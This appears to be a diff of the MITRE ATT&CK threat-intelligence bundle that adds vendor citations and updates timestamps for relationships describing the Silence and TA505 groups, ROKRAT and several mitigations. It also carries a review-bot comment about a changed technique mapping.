+ "description": "Group-IB. (2019, August). Silence 2.0: Going Global. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) has weaponized CHM files in their phishing campaigns.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has weaponized CHM files in their phishing campaigns.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Aug 2019)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--68602080-9968-4a36-9a5e-130343e61566",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.318Z",
+ "modified": "2020-05-06T03:32:07.265Z",
"created": "2019-05-24T17:57:36.686Z"
},
{
@@ -133427,13 +134638,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) attempts to get users to launch malicious attachments delivered via spearphishing emails.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) attempts to get users to launch malicious attachments delivered via spearphishing emails.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--efe23026-7cba-46df-873b-1c8244a92d36",
"type": "relationship",
- "modified": "2020-03-17T14:55:48.484Z",
+ "modified": "2020-05-06T03:12:02.386Z",
"created": "2019-05-24T17:57:36.689Z"
},
{
@@ -133453,13 +134669,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) has used Windows command-line to run commands.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used Windows command-line to run commands.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--f1eda5c7-6843-406d-89b8-c61759c02450",
"type": "relationship",
- "modified": "2020-03-19T16:21:36.803Z",
+ "modified": "2020-05-06T03:12:02.390Z",
"created": "2019-05-24T17:57:36.696Z"
},
{
@@ -133474,13 +134695,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) has used Winexe to install a service on the remote system.(Citation: SecureList Silence Nov 2017)",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used [Winexe](https://attack.mitre.org/software/S0191) to install a service on the remote system.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--85be49ac-785e-48af-8d0e-4b74818428fc",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.323Z",
+ "modified": "2020-05-06T03:12:02.433Z",
"created": "2019-05-24T17:57:36.723Z"
},
{
@@ -133542,13 +134768,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) has sent emails with malicious DOCX, CHM and ZIP attachments. (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) ",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has sent emails with malicious DOCX, CHM, LNK and ZIP attachments. (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--da6a811d-2a77-4f6f-a19e-2aff8662f12f",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.373Z",
+ "modified": "2020-05-06T03:12:02.478Z",
"created": "2019-05-24T17:57:36.733Z"
},
{
@@ -133609,13 +134840,28 @@
"description": "Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware",
"source_name": "Proofpoint TA505 Mar 2018"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has used spearphishing emails with malicious attachments to initially compromise victims.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used spearphishing emails with malicious attachments to initially compromise victims.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
"relationship_type": "uses",
"id": "relationship--ce962c48-3390-4286-91bb-b38d7fb4f07a",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.200Z",
+ "modified": "2020-06-01T15:46:47.676Z",
"created": "2019-05-28T16:25:35.420Z"
},
{
@@ -133656,13 +134902,23 @@
"source_name": "Proofpoint TA505 Jan 2019",
"url": "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
"description": "Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019."
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has sent spearphishing emails containing malicious links.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 Jan 2019)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has sent spearphishing emails containing malicious links.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 Jan 2019)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)",
"relationship_type": "uses",
"id": "relationship--e3f7935d-0f3a-440a-be19-ef9383914441",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.257Z",
+ "modified": "2020-05-29T20:09:49.188Z",
"created": "2019-05-28T16:36:50.742Z"
},
{
@@ -133718,13 +134974,23 @@
"description": "Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times",
"source_name": "Proofpoint TA505 June 2018"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has used VBS for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used VBS for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Trend Micro TA505 June 2019)(Citation: IBM TA505 April 2020)",
"relationship_type": "uses",
"id": "relationship--5aaee352-e4b5-4d4c-b021-9f38adb346da",
"type": "relationship",
- "modified": "2020-03-19T17:35:11.707Z",
+ "modified": "2020-06-01T15:46:47.950Z",
"created": "2019-05-28T16:53:41.745Z"
},
{
@@ -133837,13 +135103,28 @@
"description": "Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware",
"source_name": "Proofpoint TA505 Mar 2018"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, [TA505](https://attack.mitre.org/groups/G0092) makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, [TA505](https://attack.mitre.org/groups/G0092) makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
"relationship_type": "uses",
"id": "relationship--49d6508c-f350-4376-ba32-f64693d7fd10",
"type": "relationship",
- "modified": "2020-03-17T15:01:32.719Z",
+ "modified": "2020-06-01T15:46:48.052Z",
"created": "2019-05-28T18:49:59.356Z"
},
{
@@ -133858,13 +135139,18 @@
"description": "Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter",
"source_name": "Proofpoint TA505 Sep 2017"
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
}
],
- "description": "(Citation: Proofpoint TA505 Sep 2017)",
+ "description": "(Citation: Proofpoint TA505 Sep 2017)(Citation: IBM TA505 April 2020)",
"relationship_type": "uses",
"id": "relationship--239a4ed5-afe6-4d1d-8dfe-ee4df7bc01ba",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.452Z",
+ "modified": "2020-06-01T14:53:46.623Z",
"created": "2019-05-28T18:49:59.414Z"
},
{
@@ -133879,13 +135165,23 @@
"description": "Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware",
"source_name": "Proofpoint TA505 Mar 2018"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
}
],
- "description": "(Citation: Proofpoint TA505 Mar 2018)",
+ "description": "(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)",
"relationship_type": "uses",
"id": "relationship--1b215137-e9e7-4022-af63-8d932c384eb2",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.542Z",
+ "modified": "2020-05-29T20:09:49.523Z",
"created": "2019-05-28T19:08:05.735Z"
},
{
@@ -134094,13 +135390,18 @@
"description": "Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.",
"url": "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
"source_name": "Deep Instinct TA505 Apr 2019"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has used msiexec to download and execute malicious Windows Installer files.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used msiexec to download and execute malicious Windows Installer files.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)",
"relationship_type": "uses",
"id": "relationship--2f350d97-8492-4eb4-8640-2c3ae2bc8df1",
"type": "relationship",
- "modified": "2020-03-17T14:38:57.120Z",
+ "modified": "2020-05-29T19:02:07.218Z",
"created": "2019-05-29T12:47:44.943Z"
},
{
@@ -134146,13 +135447,18 @@
"description": "Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.",
"url": "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
"source_name": "Deep Instinct TA505 Apr 2019"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has signed payloads with code signing certificates from Thawte and Sectigo.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has signed payloads with code signing certificates from Thawte and Sectigo.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)",
"relationship_type": "uses",
"id": "relationship--badc4d79-2f59-4b9b-9044-9c53dcd386c0",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.399Z",
+ "modified": "2020-06-16T16:57:13.452Z",
"created": "2019-05-29T13:02:31.667Z"
},
{
@@ -134177,13 +135483,18 @@
"description": "Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.",
"url": "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
"source_name": "Deep Instinct TA505 Apr 2019"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
}
],
- "description": "(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)",
+ "description": "(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)",
"relationship_type": "uses",
"id": "relationship--7575fb4d-0fa3-4a16-acb6-734841da41bc",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.544Z",
+ "modified": "2020-05-29T19:02:07.489Z",
"created": "2019-05-29T13:40:48.666Z"
},
{
@@ -134486,13 +135797,23 @@
"source_name": "Proofpoint TA505 Jan 2019",
"url": "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
"description": "Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019."
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
}
],
- "description": "(Citation: Proofpoint TA505 Jan 2019)",
+ "description": "(Citation: Proofpoint TA505 Jan 2019)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)",
"relationship_type": "uses",
"id": "relationship--60026624-0ae9-439a-8ee8-faee7ce6ddf0",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.540Z",
+ "modified": "2020-05-29T20:09:49.511Z",
"created": "2019-05-29T14:33:43.929Z"
},
{
@@ -134606,13 +135927,18 @@
"description": "Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times",
"source_name": "Proofpoint TA505 June 2018"
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
}
],
- "description": "(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)",
+ "description": "(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: IBM TA505 April 2020)",
"relationship_type": "uses",
"id": "relationship--1e7f0283-1aeb-4b9e-81e0-4aec48e30228",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.546Z",
+ "modified": "2020-06-01T14:53:46.663Z",
"created": "2019-05-30T19:49:35.757Z"
},
{
@@ -134813,16 +136139,21 @@
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"external_references": [
{
- "source_name": "Securelist ScarCruft May 2019",
+ "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.",
"url": "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
- "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019."
+ "source_name": "Securelist ScarCruft May 2019"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) has the ability to gather a list of files and directories on the infected system.(Citation: Securelist ScarCruft May 2019)\t",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) has the ability to gather a list of files and directories on the infected system.(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)",
"relationship_type": "uses",
"id": "relationship--90be71e4-6b38-4411-aac5-09711a334393",
"type": "relationship",
- "modified": "2019-07-26T22:56:58.585Z",
+ "modified": "2020-05-21T17:07:02.808Z",
"created": "2019-06-04T14:17:34.176Z"
},
{
@@ -136683,7 +138014,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"external_references": [
{
"source_name": "Bromium Ursnif Mar 2017",
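Review bot: The `target_ref` of `relationship--b5ebcf96-92f6-46d3-a9a1-1773e4f3ec02` is changed to a different `attack-pattern` while the relationship keeps its id, so the same identifier now denotes a different technique mapping than it did before this commit. Any consumer that caches technique mappings keyed on the relationship id will keep the old target unless it also compares `modified`, which the following hunk bumps for this same object. If this bundle is what selects or labels tests per technique (presumably the case for this repository), confirm that the loader re-reads `target_ref` on every refresh rather than treating the id as stable per technique. The relationship object begins before this hunk.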
@@ -136695,7 +138026,7 @@
"relationship_type": "uses",
"id": "relationship--b5ebcf96-92f6-46d3-a9a1-1773e4f3ec02",
"type": "relationship",
- "modified": "2020-03-19T17:40:56.458Z",
+ "modified": "2020-06-24T13:57:17.221Z",
"created": "2019-06-10T17:44:49.367Z"
},
{
@@ -136838,7 +138169,7 @@
"id": "relationship--9ffc8525-79a5-40a2-b371-46052daf66c5",
"description": "Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.",
"type": "relationship",
- "modified": "2020-03-23T15:28:13.533Z",
+ "modified": "2020-05-04T18:36:39.435Z",
"created": "2019-06-13T16:04:04.082Z"
},
{
@@ -136852,7 +138183,7 @@
"id": "relationship--21ea4371-e692-4731-9f8c-c3f4dff3c775",
"description": "Configure access controls and firewalls to limit access to critical systems and domain controllers. Most cloud environments support separate virtual private cloud (VPC) instances that enable further segmentation of cloud systems.",
"type": "relationship",
- "modified": "2020-03-23T15:28:13.583Z",
+ "modified": "2020-05-04T18:36:39.488Z",
"created": "2019-06-13T16:04:04.168Z"
},
{
@@ -136866,7 +138197,7 @@
"id": "relationship--74e433ec-0c52-42f2-b0d4-3e1f3a56b419",
"description": "Use multi-factor authentication for user and privileged accounts.",
"type": "relationship",
- "modified": "2020-03-23T15:28:13.559Z",
+ "modified": "2020-05-04T18:36:39.522Z",
"created": "2019-06-13T16:04:04.180Z"
},
{
@@ -136983,7 +138314,7 @@
"description": "Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means.",
"id": "relationship--4df90c69-8ac5-4f22-b0cf-dd4debb8e051",
"type": "relationship",
- "modified": "2019-07-16T19:44:08.123Z",
+ "modified": "2020-03-31T22:18:43.144Z",
"created": "2019-06-13T16:43:14.999Z"
},
{
@@ -136997,7 +138328,7 @@
"description": "Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. Strong passwords should be used on certain encrypted documents that use them to prevent offline cracking through [Brute Force](https://attack.mitre.org/techniques/T1110) techniques.",
"id": "relationship--967c7069-6bb3-4f10-ba6b-5befdabe6c97",
"type": "relationship",
- "modified": "2019-07-16T19:44:08.132Z",
+ "modified": "2020-03-31T22:18:43.158Z",
"created": "2019-06-13T16:43:15.017Z"
},
{
@@ -137018,7 +138349,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T23:28:10.323Z",
+ "modified": "2020-05-20T18:23:36.110Z",
"created": "2019-06-13T16:47:55.972Z"
},
{
@@ -137066,13 +138397,13 @@
"source_name": "TCG Trusted Platform Module"
},
{
- "url": "https://technet.microsoft.com/en-us/windows/dn168167.aspx",
- "description": "Microsoft. (n.d.). Secure the Windows 8.1 boot process. Retrieved June 11, 2016.",
+ "url": "https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process",
+ "description": "Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.",
"source_name": "TechNet Secure Boot Process"
}
],
"type": "relationship",
- "modified": "2020-03-20T19:53:25.785Z",
+ "modified": "2020-04-23T19:10:28.421Z",
"created": "2019-06-13T16:49:49.549Z"
},
{
@@ -137111,7 +138442,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8",
"relationship_type": "mitigates",
- "description": "Set a browser extension white or black list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)",
+ "description": "Set a browser extension allow or deny list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)",
"id": "relationship--e13f1e41-fc5c-4cd3-ad6b-62bc597c959a",
"external_references": [
{
@@ -137121,7 +138452,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T23:36:30.822Z",
